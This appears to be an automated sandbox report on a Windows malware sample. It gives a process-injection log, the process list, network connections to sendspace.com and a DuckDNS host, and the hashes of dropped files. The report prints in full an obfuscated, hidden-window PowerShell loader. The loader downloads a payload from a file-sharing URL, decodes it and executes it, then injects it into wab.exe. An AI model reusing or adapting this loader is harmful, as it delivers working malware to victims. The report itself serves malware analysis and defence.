PID 4204 wrote to memory of 2308 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 4204 wrote to memory of 1844 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 4204 wrote to memory of 1844 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 4204 wrote to memory of 1844 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 1844 wrote to memory of 2624 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 1844 wrote to memory of 2624 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 1844 wrote to memory of 2624 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 1844 wrote to memory of 4896 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 1844 wrote to memory of 4896 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 1844 wrote to memory of 4896 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 1844 wrote to memory of 4896 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 1844 wrote to memory of 4896 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe

Processes

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\b84eb711989fbe9e0ff3ec874b5a0dac33655d27929fdce619ea94a35dca8953.cmd"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -windowstyle hidden "$Decisorens='Sub';$Decisorens+='strin';$Pissoirets = 1;$Decisorens+='g';Function Ovibovinae($Gtteris){$brsflsomme=$Gtteris.Length-$Pissoirets;For($Ssttes89=5;$Ssttes89 -lt $brsflsomme;$Ssttes89+=6){$tored+=$Gtteris.$Decisorens.Invoke( $Ssttes89, $Pissoirets);}$tored;}function Siphoning($Moduler){ . ($Fratrdelsen) ($Moduler);}$topografs=Ovibovinae 'AmbulMSkunkoProvezUnb,niG,undlJimcrlPrrieaChoke/Rense5 Unde.Palp 0Ukonv Djede( R llWErhveiLrerinfluordK edio B,nswBloodsEri d ForbrN .tigT Clin Sand1Ekspa0Bandi.Presn0biogr;Indtg Tera,W VindiCheepn,eraa6 Dise4 pato;Masca RkenvxBende6,ymno4 nel;Brand Kolonr.onulv.eget:Reack1Alons2 lagl1Wen,h. eyed0Isklu) Efte Bere.Gf oebe LatecBa,isks,ndhoAmico/Sekst2 P ug0Go,er1Unhab0Ja id0godhj1Mando0l.bor1Repla SchweFJordliSp dsrYe peest,fff Esdro,eavexDispo/Cykel1.ngos2.belt1Diath.Stted0p,ece ';$Lettroenheds=Ovibovinae 'BrestUAfgnisGarroe Spr,rSyd,o-DiestAR.pargF.ldme Udd,nRivert Amir ';$Ciboney=Ovibovinae 'Fjerbh Hygrt MedltHyld p InvasSemid:Urano/Mel b/Prea.wCi,taw In,awSemin.Lith.sForlge sepanFremldSports Akkopb,spaaNyderc Pretedenia. YankcMastioEndosmSelen/StorhpBluntrChaulomo st/UdgradParcelUnvar/IntenhGopledBeetra Em.e6Afl,dmAfdelgEpaen ';$Transporterings7=Ovibovinae 'Ankri>resfo ';$Fratrdelsen=Ovibovinae 'Imprei KommeOilstxDomi, ';$Bivirknings='Unionizing';$septodiarrhea = Ovibovinae ' Socie St,tcHelheh TredoCathe Afsla%K.skvaReefypHensipLaserdBldkoaUntretJin la Mega% Unim\UnvioA,ecrinturaceH vedmCallgoDummetJas iavejf.x DidyiSenils Skif.D.ttoS Frgea,kravfWalin fanta&Henot&Overb AntiweS,attc Incrh ironoBramb nchatBrint ';Siphoning (Ovibovinae 'Ska,b$,laapgMin rl S.lfoVandfbUnipoaSljdll un r:RdninFFormaoOrigirRe,egeCardis MurktAccupa KidnaUo mreMagelnFortad AtheeRuddo=Redis(SammecVe.dem Fis dMarty Hogti/Ransac nmag ,irma$Ove.lsObjeceStirpp BegrtSphenoAfso dFortriSaarfa,lbumrtalr rN,nvohDermieAditsaUnsal)Kol.e ');Siphoning (Ovibovinae ' Unre$Baxiegl,ndslFras.o enfibDeltaaDilutlOrnit:Nonhyt ExamaTranssHydr kVetoweSongbn.triksFe.edpBegitiVanddlSk.lnlOvereeFaculrVskete emor=Polit$ ,ivsCFrikiiKl.rgbEffekoTapionDysm,eSolblySm tt.KarelsTetrapTeg.tlStathiVievatScape( Sang$ UnclTRemitrBeskya s linApatisUnadvp Fa roReblarIso,atPersoeMelderLin.iiInedunpoleagNe.rus pr.d7Forva)tr st ');$Ciboney=$taskenspillere[0];$Vornedskabs= (Ovibovinae 'Inter$SubjegKomprlF,rmio SambbBla.kaVig.ilbrinv:ForhaAIch ebSkaldoTrilom AfskaDelaysDesoruSta.isFilet=Ed,erNVersee YndewCross-DozerOStorkbDandajHourle TermcUmp.ntStrik PolyS Kdvayhightsprogrt T,bee Syntm Modt.Vrt,nNsubskeTalmut Armi.An geW P,ateOrmu.bH.adcCSh.velFacepidemiueFolkenFejlgt');$Vornedskabs+=$Forestaaende[1];Siphoning ($Vornedskabs);Siphoning (Ovibovinae '.ngan$BomulA DodgbInteroUnrecm.kovfaKontisCa hau MonisSkarn.MajdaH.aneleretolaTeknodFort,e Udr.r RittsReima[Senio$L,ladLGenskeUbehjtF otytLxxcorSnvleoFraade,ealin spash.orblehapted K.nesSule.]Sk.ed=Eri k$ Tr.et Ca,co azerpSulteo UnchgCarserEkphoaThybofKom,usgudhj ');$Rastedes=Ovibovinae ' ,tat$TabirA OplybTillgo VeksmB.gnia ustis SeptuNedslsBortf.SkinpDF rwao Aftaw.adionAera lN,lgnoThwaraMotocdGlaucF HostiDukkelHulake aner(Aarsr$,aimoCmaaleiBilbob PretoMotornShrineProtyyCompa, Rets$Et,peBkdgryeG,nnea Obdut Nonti U,rifSkippiBl msc,unnaaDescrl De.i) P,ec ';$Beatifical=$Forestaaende[0];Siphoning (Ovibovinae 'Nahum$ SiskgMu.til E gloF.ldkbMisanaTiltrlbohun:Po itkle.hal ,undaCr nipWelshp,lgaaeSkule=Kunde(TokobTHvileeStibisImplit Ynke-Sm ltPTelefa,nsvatNatdrhUdsto verbi$Res rBHun,eeDre.eaUnr,atYamskiStvb,fTermiiMisfacHitchaso tsl Un.o) Anti ');while (!$klappe) {Siphoning (Ovibovinae 'As,en$halshgGiobelMagmaoast,obAspidaUltralIndef: amilI He sn Pinel GidsaKransk Slu eAerob=Dec.m$H,ddottils rS,agsuMokkaeUns i ') ;Siphoning $Rastedes;Siphoning (Ovibovinae ' DaemSPlkimtkraniaUdsmyrUp,aktPitho-MankeSBundfl,remae DipleDisc.p Whit Dor.4Mejse ');Siphoning (Ovibovinae 'Yar e$,ikspgBugollCuamuo EmnebWurz atoaarll.veb: orskkSnydelNedkma SonipHellep skileRhabd= Unpr( Rap.TBaluse iessErnr,tFirea-InterPTransaMaveptSpecih Orig Erken$SuperB.tande.ltinaBetlet Ik di in.sfLutrii IllucMacroaKonfelTi,ul)Bra,t ') ;Siphoning (Ovibovinae 'Trans$ Ra,ggBekral DekroMinerb Sen,a,eduplRabb,:PohnaTCogitrAnd.saDragsk perstGeneraLikeltri,lebparmorT,rsku FotodAttendMonoceAfstit NordsDeca =A tor$ symmgOmo hlFangeoRundsbDoddyaDikotlellip:BoombTCerasyTendidBuffie ScrulOutjeiFan ag ennehGoddaeW xesd KontsAflur6Psyki0Att i+Tata,+grape%Drkl $ afvit Gudsa iurs KrigkSakkaeIndben N nms Forgp ,alei,vindl EpidlK afte uperAchroePorta. BlomcDagsmoStordu Svernhu,outConco ') ;$Ciboney=$taskenspillere[$Traktatbruddets];}$Besvangrings=327350;$Magnetizes=29673;Siphoning (Ovibovinae 'Himme$LeucogDist.l Vi ioMusm bS peraAnti.lIncon:Befu,F ,andoover,r klipmUregeeCannulNebuleTomatn,rder Tarms=Gangl ExxheGProgrealbyltHemme-egundC,roteoStor,nNonlotprogreRullenShm,otfrdse Agnus$JambkB Snige Ticta SkjotModuliEfterf DandiSke.tc Exena FlyvlForre ');Siphoning (Ovibovinae 'Gensk$ ogedgInappl f.looMorinbFiguragramml.hanc:AesthCSvirroElektn dkoms,nremtSga.er l moaAntiaiAf,enn AfteiFunktnSjakfgGawkylO.kldybonde Kinet=Chanc Photo[,onreS Semiy M,thsflamitPorceeYodelmMaske. eepyCOmstnoKamm.nSaxicv IsobePalmirstilltHydro]Ddssy:elekt:BeltwFResperSpil.o,edfim Wi,dB Vi raU opys SlakeSrgem6.oney4Com.lS GothtSadomrRajahiCantonOversgRegul(Be er$VbnerFDioxio.piscrimpasmT,llgeUn.erlSa.sgeVand nGirob)Allic ');Siphoning (Ovibovinae 'Unwar$ChampgNonhelBowleoE dosb R tea U.islInven:ApperAS,elluVedlgtSavleo Omdiv Ple.a Karts.entekTripteungesaGa ann iorglPe,sagRicingStense,erbotMitzy F.ys= .los Kandi[StumoSIngeryYndigsBeregtBiloceafi nmNonob. PensTUskyleEurokx Zaddtforbl.BosweE ewhnNoncoc PropoUnmasdGe,nei FisknRe,izg Outs]Presc:Skovb:RathaALandlS FratC AngeIMonodIFradr.SkoleGRemudeHy,hetYummiS Untht AsylrUna,iiUndernKak.fg frem( Unst$K,hytCTr,teoHelmenPli,tsFrerbtAtt,irChloraepephiFuturn Har iSceptnSuperg BrislSkrifyT lin)Tengu ');Siphoning (Ovibovinae 'Discu$HeavegChaldl.igtso Ove,bKonseaHovmolValed:UdbanBWild,o,ffenoMatarzEarspetruncrSa,nt=Tuber$ TeleAPa.dauyirtht mancoFoothvKingfaDri ks SeggkDreameRaadgaStempnAn ecl Kna.gObersg Tik eSognet ditt. AalesTorifuArboubPodagsFlanntNonidrA,achimis tnGalgagKludr(Nonne$baadeBSupraeb.sots.komavBrostaA.rennEnestg Duh r DistikogepnSpringLoatus Faru,Repo $TekstMMartha AmphgP ussntricaef,edst.alskiA,trkzSkattemelansAscog).iana ');Siphoning $Boozer;"

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Anemotaxis.Saf && echo t"

C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Decisorens='Sub';$Decisorens+='strin';$Pissoirets = 1;$Decisorens+='g';Function Ovibovinae($Gtteris){$brsflsomme=$Gtteris.Length-$Pissoirets;For($Ssttes89=5;$Ssttes89 -lt $brsflsomme;$Ssttes89+=6){$tored+=$Gtteris.$Decisorens.Invoke( $Ssttes89, $Pissoirets);}$tored;}function Siphoning($Moduler){ . ($Fratrdelsen) ($Moduler);}$topografs=Ovibovinae 'AmbulMSkunkoProvezUnb,niG,undlJimcrlPrrieaChoke/Rense5 Unde.Palp 0Ukonv Djede( R llWErhveiLrerinfluordK edio B,nswBloodsEri d ForbrN .tigT Clin Sand1Ekspa0Bandi.Presn0biogr;Indtg Tera,W VindiCheepn,eraa6 Dise4 pato;Masca RkenvxBende6,ymno4 nel;Brand Kolonr.onulv.eget:Reack1Alons2 lagl1Wen,h. eyed0Isklu) Efte Bere.Gf oebe LatecBa,isks,ndhoAmico/Sekst2 P ug0Go,er1Unhab0Ja id0godhj1Mando0l.bor1Repla SchweFJordliSp dsrYe peest,fff Esdro,eavexDispo/Cykel1.ngos2.belt1Diath.Stted0p,ece ';$Lettroenheds=Ovibovinae 'BrestUAfgnisGarroe Spr,rSyd,o-DiestAR.pargF.ldme Udd,nRivert Amir ';$Ciboney=Ovibovinae 'Fjerbh Hygrt MedltHyld p InvasSemid:Urano/Mel b/Prea.wCi,taw In,awSemin.Lith.sForlge sepanFremldSports Akkopb,spaaNyderc Pretedenia. YankcMastioEndosmSelen/StorhpBluntrChaulomo st/UdgradParcelUnvar/IntenhGopledBeetra Em.e6Afl,dmAfdelgEpaen ';$Transporterings7=Ovibovinae 'Ankri>resfo ';$Fratrdelsen=Ovibovinae 'Imprei KommeOilstxDomi, ';$Bivirknings='Unionizing';$septodiarrhea = Ovibovinae ' Socie St,tcHelheh TredoCathe Afsla%K.skvaReefypHensipLaserdBldkoaUntretJin la Mega% Unim\UnvioA,ecrinturaceH vedmCallgoDummetJas iavejf.x DidyiSenils Skif.D.ttoS Frgea,kravfWalin fanta&Henot&Overb AntiweS,attc Incrh ironoBramb nchatBrint ';Siphoning (Ovibovinae 'Ska,b$,laapgMin rl S.lfoVandfbUnipoaSljdll un r:RdninFFormaoOrigirRe,egeCardis MurktAccupa KidnaUo mreMagelnFortad AtheeRuddo=Redis(SammecVe.dem Fis dMarty Hogti/Ransac nmag ,irma$Ove.lsObjeceStirpp BegrtSphenoAfso dFortriSaarfa,lbumrtalr rN,nvohDermieAditsaUnsal)Kol.e ');Siphoning (Ovibovinae ' Unre$Baxiegl,ndslFras.o enfibDeltaaDilutlOrnit:Nonhyt ExamaTranssHydr kVetoweSongbn.triksFe.edpBegitiVanddlSk.lnlOvereeFaculrVskete emor=Polit$ ,ivsCFrikiiKl.rgbEffekoTapionDysm,eSolblySm tt.KarelsTetrapTeg.tlStathiVievatScape( Sang$ UnclTRemitrBeskya s linApatisUnadvp Fa roReblarIso,atPersoeMelderLin.iiInedunpoleagNe.rus pr.d7Forva)tr st ');$Ciboney=$taskenspillere[0];$Vornedskabs= (Ovibovinae 'Inter$SubjegKomprlF,rmio SambbBla.kaVig.ilbrinv:ForhaAIch ebSkaldoTrilom AfskaDelaysDesoruSta.isFilet=Ed,erNVersee YndewCross-DozerOStorkbDandajHourle TermcUmp.ntStrik PolyS Kdvayhightsprogrt T,bee Syntm Modt.Vrt,nNsubskeTalmut Armi.An geW P,ateOrmu.bH.adcCSh.velFacepidemiueFolkenFejlgt');$Vornedskabs+=$Forestaaende[1];Siphoning ($Vornedskabs);Siphoning (Ovibovinae '.ngan$BomulA DodgbInteroUnrecm.kovfaKontisCa hau MonisSkarn.MajdaH.aneleretolaTeknodFort,e Udr.r RittsReima[Senio$L,ladLGenskeUbehjtF otytLxxcorSnvleoFraade,ealin spash.orblehapted K.nesSule.]Sk.ed=Eri k$ Tr.et Ca,co azerpSulteo UnchgCarserEkphoaThybofKom,usgudhj ');$Rastedes=Ovibovinae ' ,tat$TabirA OplybTillgo VeksmB.gnia ustis SeptuNedslsBortf.SkinpDF rwao Aftaw.adionAera lN,lgnoThwaraMotocdGlaucF HostiDukkelHulake aner(Aarsr$,aimoCmaaleiBilbob PretoMotornShrineProtyyCompa, Rets$Et,peBkdgryeG,nnea Obdut Nonti U,rifSkippiBl msc,unnaaDescrl De.i) P,ec ';$Beatifical=$Forestaaende[0];Siphoning (Ovibovinae 'Nahum$ SiskgMu.til E gloF.ldkbMisanaTiltrlbohun:Po itkle.hal ,undaCr nipWelshp,lgaaeSkule=Kunde(TokobTHvileeStibisImplit Ynke-Sm ltPTelefa,nsvatNatdrhUdsto verbi$Res rBHun,eeDre.eaUnr,atYamskiStvb,fTermiiMisfacHitchaso tsl Un.o) Anti ');while (!$klappe) {Siphoning (Ovibovinae 'As,en$halshgGiobelMagmaoast,obAspidaUltralIndef: amilI He sn Pinel GidsaKransk Slu eAerob=Dec.m$H,ddottils rS,agsuMokkaeUns i ') ;Siphoning $Rastedes;Siphoning (Ovibovinae ' DaemSPlkimtkraniaUdsmyrUp,aktPitho-MankeSBundfl,remae DipleDisc.p Whit Dor.4Mejse ');Siphoning (Ovibovinae 'Yar e$,ikspgBugollCuamuo EmnebWurz atoaarll.veb: orskkSnydelNedkma SonipHellep skileRhabd= Unpr( Rap.TBaluse iessErnr,tFirea-InterPTransaMaveptSpecih Orig Erken$SuperB.tande.ltinaBetlet Ik di in.sfLutrii IllucMacroaKonfelTi,ul)Bra,t ') ;Siphoning (Ovibovinae 'Trans$ Ra,ggBekral DekroMinerb Sen,a,eduplRabb,:PohnaTCogitrAnd.saDragsk perstGeneraLikeltri,lebparmorT,rsku FotodAttendMonoceAfstit NordsDeca =A tor$ symmgOmo hlFangeoRundsbDoddyaDikotlellip:BoombTCerasyTendidBuffie ScrulOutjeiFan ag ennehGoddaeW xesd KontsAflur6Psyki0Att i+Tata,+grape%Drkl $ afvit Gudsa iurs KrigkSakkaeIndben N nms Forgp ,alei,vindl EpidlK afte uperAchroePorta. BlomcDagsmoStordu Svernhu,outConco ') ;$Ciboney=$taskenspillere[$Traktatbruddets];}$Besvangrings=327350;$Magnetizes=29673;Siphoning (Ovibovinae 'Himme$LeucogDist.l Vi ioMusm bS peraAnti.lIncon:Befu,F ,andoover,r klipmUregeeCannulNebuleTomatn,rder Tarms=Gangl ExxheGProgrealbyltHemme-egundC,roteoStor,nNonlotprogreRullenShm,otfrdse Agnus$JambkB Snige Ticta SkjotModuliEfterf DandiSke.tc Exena FlyvlForre ');Siphoning (Ovibovinae 'Gensk$ ogedgInappl f.looMorinbFiguragramml.hanc:AesthCSvirroElektn dkoms,nremtSga.er l moaAntiaiAf,enn AfteiFunktnSjakfgGawkylO.kldybonde Kinet=Chanc Photo[,onreS Semiy M,thsflamitPorceeYodelmMaske. eepyCOmstnoKamm.nSaxicv IsobePalmirstilltHydro]Ddssy:elekt:BeltwFResperSpil.o,edfim Wi,dB Vi raU opys SlakeSrgem6.oney4Com.lS GothtSadomrRajahiCantonOversgRegul(Be er$VbnerFDioxio.piscrimpasmT,llgeUn.erlSa.sgeVand nGirob)Allic ');Siphoning (Ovibovinae 'Unwar$ChampgNonhelBowleoE dosb R tea U.islInven:ApperAS,elluVedlgtSavleo Omdiv Ple.a Karts.entekTripteungesaGa ann iorglPe,sagRicingStense,erbotMitzy F.ys= .los Kandi[StumoSIngeryYndigsBeregtBiloceafi nmNonob. PensTUskyleEurokx Zaddtforbl.BosweE ewhnNoncoc PropoUnmasdGe,nei FisknRe,izg Outs]Presc:Skovb:RathaALandlS FratC AngeIMonodIFradr.SkoleGRemudeHy,hetYummiS Untht AsylrUna,iiUndernKak.fg frem( Unst$K,hytCTr,teoHelmenPli,tsFrerbtAtt,irChloraepephiFuturn Har iSceptnSuperg BrislSkrifyT lin)Tengu ');Siphoning (Ovibovinae 'Discu$HeavegChaldl.igtso Ove,bKonseaHovmolValed:UdbanBWild,o,ffenoMatarzEarspetruncrSa,nt=Tuber$ TeleAPa.dauyirtht mancoFoothvKingfaDri ks SeggkDreameRaadgaStempnAn ecl Kna.gObersg Tik eSognet ditt. AalesTorifuArboubPodagsFlanntNonidrA,achimis tnGalgagKludr(Nonne$baadeBSupraeb.sots.komavBrostaA.rennEnestg Duh r DistikogepnSpringLoatus Faru,Repo $TekstMMartha AmphgP ussntricaef,edst.alskiA,trkzSkattemelansAscog).iana ');Siphoning $Boozer;"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Anemotaxis.Saf && echo t"

C:\Program Files (x86)\windows mail\wab.exe

"C:\Program Files (x86)\windows mail\wab.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 www.sendspace.com udp
US 172.67.170.105:443 www.sendspace.com tcp
US 8.8.8.8:53 133.211.185.52.in-addr.arpa udp
US 8.8.8.8:53 0.205.248.87.in-addr.arpa udp
US 8.8.8.8:53 fs12n4.sendspace.com udp
CA 69.31.136.53:443 fs12n4.sendspace.com tcp
US 8.8.8.8:53 crt.sectigo.com udp
US 104.18.38.233:80 crt.sectigo.com tcp
US 8.8.8.8:53 105.170.67.172.in-addr.arpa udp
US 8.8.8.8:53 53.136.31.69.in-addr.arpa udp
US 8.8.8.8:53 23.159.190.20.in-addr.arpa udp
NL 23.62.61.160:443 www.bing.com tcp
US 8.8.8.8:53 43.58.199.20.in-addr.arpa udp
US 8.8.8.8:53 160.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 249.197.17.2.in-addr.arpa udp
US 8.8.8.8:53 233.38.18.104.in-addr.arpa udp
US 8.8.8.8:53 217.106.137.52.in-addr.arpa udp
CA 69.31.136.53:443 fs12n4.sendspace.com tcp
US 8.8.8.8:53 23.149.64.172.in-addr.arpa udp
US 8.8.8.8:53 86.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 232.168.11.51.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 25.14.97.104.in-addr.arpa udp
US 172.67.170.105:443 www.sendspace.com tcp
US 8.8.8.8:53 fs13n4.sendspace.com udp
US 8.8.8.8:53 67.169.217.172.in-addr.arpa udp
CA 69.31.136.57:443 fs13n4.sendspace.com tcp
US 8.8.8.8:53 57.136.31.69.in-addr.arpa udp
US 8.8.8.8:53 xvern429.duckdns.org udp
US 12.202.180.134:8890 xvern429.duckdns.org tcp
US 8.8.8.8:53 134.180.202.12.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 26.35.223.20.in-addr.arpa udp
US 8.8.8.8:53 19.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 88.156.103.20.in-addr.arpa udp
US 8.8.8.8:53 175.117.168.52.in-addr.arpa udp

Files

memory/4204-2-0x00007FFA4C3A3000-0x00007FFA4C3A5000-memory.dmp

memory/4204-8-0x0000020AF4260000-0x0000020AF4282000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_4lquy30a.0m2.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4204-13-0x00007FFA4C3A0000-0x00007FFA4CE61000-memory.dmp

memory/4204-14-0x00007FFA4C3A0000-0x00007FFA4CE61000-memory.dmp

memory/4204-17-0x00007FFA4C3A0000-0x00007FFA4CE61000-memory.dmp

memory/4204-22-0x00007FFA4C3A3000-0x00007FFA4C3A5000-memory.dmp

memory/4204-23-0x00007FFA4C3A0000-0x00007FFA4CE61000-memory.dmp

memory/4204-28-0x00007FFA4C3A0000-0x00007FFA4CE61000-memory.dmp

memory/1844-29-0x000000007543E000-0x000000007543F000-memory.dmp

memory/1844-30-0x0000000002240000-0x0000000002276000-memory.dmp

memory/1844-31-0x0000000004C50000-0x0000000005278000-memory.dmp

memory/1844-32-0x0000000075430000-0x0000000075BE0000-memory.dmp

memory/1844-33-0x0000000075430000-0x0000000075BE0000-memory.dmp

memory/1844-34-0x0000000004BC0000-0x0000000004BE2000-memory.dmp

memory/1844-45-0x00000000057A0000-0x0000000005806000-memory.dmp

memory/1844-44-0x0000000005430000-0x0000000005496000-memory.dmp

memory/1844-46-0x0000000005810000-0x0000000005B64000-memory.dmp

memory/1844-47-0x0000000005B70000-0x0000000005B8E000-memory.dmp

memory/1844-48-0x0000000005B90000-0x0000000005BDC000-memory.dmp

memory/1844-49-0x00000000073E0000-0x0000000007A5A000-memory.dmp

memory/1844-50-0x0000000006110000-0x000000000612A000-memory.dmp

memory/1844-51-0x0000000006E70000-0x0000000006F06000-memory.dmp

memory/1844-52-0x0000000006DD0000-0x0000000006DF2000-memory.dmp

memory/1844-53-0x0000000008010000-0x00000000085B4000-memory.dmp

C:\Users\Admin\AppData\Roaming\Anemotaxis.Saf

MD5 18fc7a00c5b4cd7bf88445aaf24491bf
SHA1 8127f6999587c6b0bfde91fceac9d0106907b9d2
SHA256 38393e1abae0ed937471b6d4196ebbf100921142ea85d266b3505cc24a992fc2
SHA512 0127009c795974510ea898f320450e7bd0b76dd395374c4058adab95e39e27459306cde56de5b39cd38f053513b26eda0d76da34af8cb9ca352daa5d5323ebfb

memory/4204-55-0x00007FFA4C3A0000-0x00007FFA4CE61000-memory.dmp

memory/1844-56-0x00000000085C0000-0x000000000BED0000-memory.dmp

memory/4204-58-0x00007FFA4C3A0000-0x00007FFA4CE61000-memory.dmp

memory/1844-59-0x000000007543E000-0x000000007543F000-memory.dmp

memory/1844-63-0x0000000075430000-0x0000000075BE0000-memory.dmp

memory/4896-77-0x0000000001000000-0x0000000001016000-memory.dmp

memory/4896-76-0x0000000001000000-0x0000000002254000-memory.dmp

memory/1844-78-0x0000000075430000-0x0000000075BE0000-memory.dmp

memory/4204-81-0x00007FFA4C3A0000-0x00007FFA4CE61000-memory.dmp

memory/4896-82-0x0000000023C50000-0x0000000023CEC000-memory.dmp